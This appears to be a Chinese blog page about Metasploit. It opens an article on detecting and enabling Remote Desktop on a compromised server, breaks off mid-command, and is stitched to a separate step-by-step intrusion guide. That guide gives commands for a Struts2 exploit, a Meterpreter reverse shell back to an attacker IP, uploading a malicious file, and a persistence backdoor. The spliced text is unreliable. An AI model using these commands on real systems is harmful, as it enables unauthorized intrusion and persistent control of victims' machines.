【神兵利器】——187、MSF远程桌面

文章前言

在渗透测试中如果我们获取到了目标服务器的权限,此时我们可以考虑查看当前服务器是否有开启远程桌面,如果有开启远程桌面则可以通过图形化界面的方式进行远程操作,更加便捷,更加迅速,如果没有开启远程桌面,那么我们可以通过获取到的shell来执行命令开启远程桌面,随后进行利用

开启服务

Step 1:服务状态检测

msf6 exploit(multi/handler) > search rdp_
msf6 exploit(multi/handler) > use 0
msf6 auxiliary(scanner/rdp/rdp_scanner) > set RHOSTS 192.168.204.151
msf6 auxiliary(scanner/rdp/rdp_scanner) > exploit

关闭状态扫描结果如下所示:

开启状态扫描结果如下所示:

Step 2:开启远程桌面

msf6 au
### 使用 Metasploit 进行远程控制的基本步骤 Metasploit 是一个功能强大的渗透测试框架,可以用于漏洞扫描、利用和后渗透攻击。若已知目标的 IP 地址(例如 192.168.56.101 或 192.168.18.18),可以通过以下流程实现远程控制。 #### 启动 Metasploit 框架 首先,在终端中启动 Metasploit 框架: ```bash msfconsole ``` #### 扫描目标网络 使用 `nmap` 或 Metasploit 自带的扫描模块来识别目标主机上开放的端口和服务。例如,使用 `auxiliary/scanner/portscan/tcp` 模块进行 TCP 端口扫描: ```bash use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.18.18 run ``` 该命令将扫描目标地址上的开放端口,帮助识别潜在的攻击面 [^2]。 #### 选择合适的漏洞利用模块 根据扫描结果,找到目标系统可能存在的漏洞并选择相应的 exploit 模块。例如,如果目标运行了 Apache Struts 并存在 CVE-2017-5638 漏洞,则可以使用如下命令: ```bash use exploit/multi/http/struts2_content_type_ognl set RHOST 192.168.18.18 set TARGETURI /index.action ``` #### 设置 payload payload 是在目标系统上执行的有效载荷,通常为反向连接 shell 或 Meterpreter 会话。例如,设置反向 TCP 连接的 payload: ```bash set payload windows/meterpreter/reverse_tcp set LHOST 192.168.56.101 set LPORT 443 ``` 上述配置表示目标将在成功利用后尝试连接到攻击者机器的指定 IP 和端口 [^1]。 #### 执行攻击 确认所有参数正确无误后,运行 exploit 命令发起攻击: ```bash exploit ``` 如果漏洞利用成功,将获得一个与目标系统的交互式会话。 #### 获取远程控制 一旦 payload 成功执行,可以使用 Meterpreter 进行多种后渗透操作,例如上传文件、捕获键盘输入或持久化访问。常用命令包括: - **获取系统信息**: ```bash sysinfo ``` - **列出当前目录下的文件**: ```bash ls ``` - **上传恶意文件**: ```bash upload malicious_file.exe ``` - **执行远程命令**: ```bash execute -f cmd.exe -c ``` #### 持久化访问 为了确保即使目标重启后仍可访问,可以使用持久化模块。例如,创建注册表项以自动启动 payload: ```bash run persistence -A -L /tmp -p 443 -r 192.168.56.101 ``` 此命令将在目标系统中添加开机自启项,以便下次连接时保持访问权限 [^1]。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值